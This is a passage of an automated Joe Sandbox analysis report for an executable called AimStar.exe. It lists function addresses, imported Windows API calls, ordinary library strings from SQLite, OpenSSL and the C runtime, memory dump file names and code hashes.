String ID:
API String ID: 2830847230-0
Opcode ID: 3c08a722618443dc9e64212b31889d72d03edf34bf81bea55b0cd35d2927df6b
Instruction ID: a3a64ce36fbeb0d4ea82506d1c7cfa2f6c8f54de9e94053aca11f503f88fe060
Opcode Fuzzy Hash: 3c08a722618443dc9e64212b31889d72d03edf34bf81bea55b0cd35d2927df6b
Instruction Fuzzy Hash: 2121DD62B0A75297E624AB16B9410BAA3A1FB45BC0F081131DBCE47F96CF3CF4508314

Function 00007FF710F420C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF710F420F4
SetWindowLongPtrW.USER32 ref: 00007FF710F42116
GetWindowLongPtrW.USER32 ref: 00007FF710F42140
InvalidateRect.USER32 ref: 00007FF710F42160

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 8a570ae75a92e774982ca7b832906848268e8ccc999ea8b94485a5429671bc05
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: E411E935B0C94682F694AB6AE5466B99295EBC47A0FC44030DF4947B8ACD2DF5C9C220

Function 00007FF8A934ECE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A934ED0C
GetCurrentThreadId.KERNEL32 ref: 00007FF8A934ED1A
GetCurrentProcessId.KERNEL32 ref: 00007FF8A934ED26
QueryPerformanceCounter.KERNEL32 ref: 00007FF8A934ED36

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction ID: 8b27eb47c21b3926b5342414c268c2936358d1536ddaf21cb1a28f24f52f6df5
Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction Fuzzy Hash: 71113022B19F419AEB00CFA0EC542B833B4FB59798F451E31DA6DC6BA4EF78D1948340

Function 00007FF710F4D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF710F4D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF710F4D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF710F4D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF710F4D0D6

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: f0317e65e8596aa9e8f84eb3ef76c3de50361feac90b3b1882d1941425c9f424
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 6F112136B18F0589EB00DF60E8552B973A8F759768F440E31EA5D467A4DF7CE198C350

Function 00007FF8A8152E0C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A8152E38
GetCurrentThreadId.KERNEL32 ref: 00007FF8A8152E46
GetCurrentProcessId.KERNEL32 ref: 00007FF8A8152E52
QueryPerformanceCounter.KERNEL32 ref: 00007FF8A8152E62

Memory Dump Source

Source File: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true

Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
Instruction ID: d5cd84849bb901c0d4e45b71b98c1f89bc297d796673082668b894612a356720
Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
Instruction Fuzzy Hash: 43117C32B16F019AEB00CF60E8442B933A4FB18798F441E31DA2D42BA4DF7CD558C394

Function 00007FF8A878DD14 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A878E0A1

Strings

out of memory, xrefs: 00007FF8A8792508
string or blob too big, xrefs: 00007FF8A8792193

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: out of memory$string or blob too big
API String ID: 2830847230-2410398255
Opcode ID: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
Instruction ID: 456c06edc3f6c684976644faf4f1ab80758be20d3a5db5832d855f24edfe721b
Opcode Fuzzy Hash: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
Instruction Fuzzy Hash: 2EC1D262F4A642A6FB25DA25C58027C6FE0EF11BC4F544436CB5E57795EF2CE8828338

Function 00007FF8A92D1A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A92E0C5B

Strings

..\s\ssl\ssl_asn1.c, xrefs: 00007FF8A92E0ACE, 00007FF8A92E0B53, 00007FF8A92E0B94, 00007FF8A92E0D34, 00007FF8A92E0DAE, 00007FF8A92E0DFA, 00007FF8A92E0E6F
d2i_SSL_SESSION, xrefs: 00007FF8A92E0AC2, 00007FF8A92E0B47, 00007FF8A92E0B88, 00007FF8A92E0DA2

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
API String ID: 3535234312-384499812
Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
Instruction ID: f23b0a9202cc2991d8efdf23b5b0a81fdb77a112d341d2e78be9064c5bfad680
Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
Instruction Fuzzy Hash: CAD13B22A0EBC6A6EB54DF29D4902B937A4FB44BC4F485035DE6C87799EF38E452C710

Function 00007FF8A87C0660 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87C0802
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87C081B

Strings

string or blob too big, xrefs: 00007FF8A87C092D

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: string or blob too big
API String ID: 2830847230-2803948771
Opcode ID: c8ac0a323bf9438d58d6516081a8c5b2cacbd73607acdce0e600ae5c24db9ecb
Instruction ID: ad4641f60641dc756fb694d45fdd62757d3b72974256fe9909efaf17ff9ce57a
Opcode Fuzzy Hash: c8ac0a323bf9438d58d6516081a8c5b2cacbd73607acdce0e600ae5c24db9ecb
Instruction Fuzzy Hash: 33919C61E8E206AAFB68DB15949537927A0EF90BC4F084135CF4D073D2DF3DE84587A8

Function 00007FF8A879CEE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A879D170

Strings

too many SQL variables, xrefs: 00007FF8A879D192
variable number must be between ?1 and ?%d, xrefs: 00007FF8A879D086

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: too many SQL variables$variable number must be between ?1 and ?%d
API String ID: 2830847230-515162456
Opcode ID: 3f5227921f22cb0f72dae9ad137befb43498b0d25aef2762e31f82c80f9ea1e5
Instruction ID: 50e4c3a139aa72d5c09e6820ece5cdc743e874b69d611d7e1619a74ad724bdfb
Opcode Fuzzy Hash: 3f5227921f22cb0f72dae9ad137befb43498b0d25aef2762e31f82c80f9ea1e5
Instruction Fuzzy Hash: 8681AD73A8AA42E5EB90DB05D4446B97FA6FB54BC4F5A8036DA4C07285EF3CE541C328

Function 00007FF8A87BA930 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87BA9DD

Strings

BINARY, xrefs: 00007FF8A87BA93C
no such collation sequence: %s, xrefs: 00007FF8A87BAB7C

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: BINARY$no such collation sequence: %s
API String ID: 2830847230-2451720372
Opcode ID: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
Instruction ID: 8ff0e36f74f8f2ef05bceb3b3b2ec28c06c77b6d84ef95eddedef28b91ec4118
Opcode Fuzzy Hash: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
Instruction Fuzzy Hash: FA71D622A4AB4165EF18AF2185483B9A392FF54BE8F485331DE6D072C5DF3CE191C364

Function 00007FF8A87B9A40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

index '%q', xrefs: 00007FF8A87B9A92

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID:
String ID: index '%q'
API String ID: 0-1628151297
Opcode ID: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
Instruction ID: 4e569c75d53d9ac6be6c523d3dfc60e28a4a6e62f0263c508ccd5c6eea2b219b
Opcode Fuzzy Hash: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
Instruction Fuzzy Hash: 5671CD32B0A645AEEB108B65D4447BD3BA2FB44BD8F000635DE2E57B89EF38D441C728

Function 00007FF8A8754A30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8754BCC

Strings

%02d, xrefs: 00007FF8A8754B6E, 00007FF8A8754BD5

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %02d
API String ID: 2830847230-896308400
Opcode ID: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
Instruction ID: 9c1e9b2f82deea932e65ed08e59acebb87fc6dbce0013c9c398957d3ec37d226
Opcode Fuzzy Hash: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
Instruction Fuzzy Hash: 1E71E132A59692A5E768CF64E4407FD7760FB847C8F105031DE8D17A49DF39E845CB14

Function 00007FF710F65B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F617D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F61803

_get_daylight.LIBCMT ref: 00007FF710F65CA4
_get_daylight.LIBCMT ref: 00007FF710F65CB5

Strings

?, xrefs: 00007FF710F65C35

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: c12f4a4090ee76b10519ae58c5fd535dcff11de2ede003b17cb943a543ac468a
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: AA412716A0CB8241FB20AB25D40A37AF6A8EB80FB4F944235EE5C17BD5DE3CE449C710

Function 00007FF710F59084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F590B6

Part of subcall function 00007FF710F5A9B8: HeapFree.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF710F4CC15), ref: 00007FF710F590D4

Strings

C:\Users\user\Desktop\AimStar.exe, xrefs: 00007FF710F590C2

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\AimStar.exe
API String ID: 3580290477-2254353971
Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction ID: ef3b490f048f8a329f2fa1bfcd24d8d1d66c579bc2926647535106b817b576ca
Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction Fuzzy Hash: 54418F36A0CF1686EB58BF2598420BCA7A8EF457E0B954035E94E43B85DE3CF589C360

Function 00007FF710F5CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF710F5CDBF
GetLastError.KERNEL32 ref: 00007FF710F5CDE1

Strings

U, xrefs: 00007FF710F5CD6B

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 6842dd85322821adde2f1955d3994eac806af9e481abc1da1606909e1ef9477a
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 9841C332B1CA4585DB609F25E4453AAA7B4FB887A4F804131EE4EC7788EF3CE505C750

Function 00007FF710F5F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF710F5F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF710F5F6BA

Strings

:, xrefs: 00007FF710F5F67E

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction ID: 89ac80d5289822b82ddf2ab77d10cbd3a83d44d7a06f022864e139933ba404c7
Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction Fuzzy Hash: 4221D522A0CA8182EB20AB15D04626EB3B9FB84B54FD54035DA8D43794DF7CFA4DCB61

Function 00007FF710F4FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF710F4FE08
RaiseException.KERNEL32 ref: 00007FF710F4FE49

Strings

csm, xrefs: 00007FF710F4FE36

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: e56dc178e188a9fdc7249747efffc83fafe547be828e979c5e87751b2456d957
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: BD113A32608B8582EB219B15E40425AB7E8FB88BA4F984230DE8D47765EF3CD559CB00

Function 00007FF710F607AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F607DC
GetDriveTypeW.KERNEL32 ref: 00007FF710F6081C

Strings

:, xrefs: 00007FF710F60805

Memory Dump Source

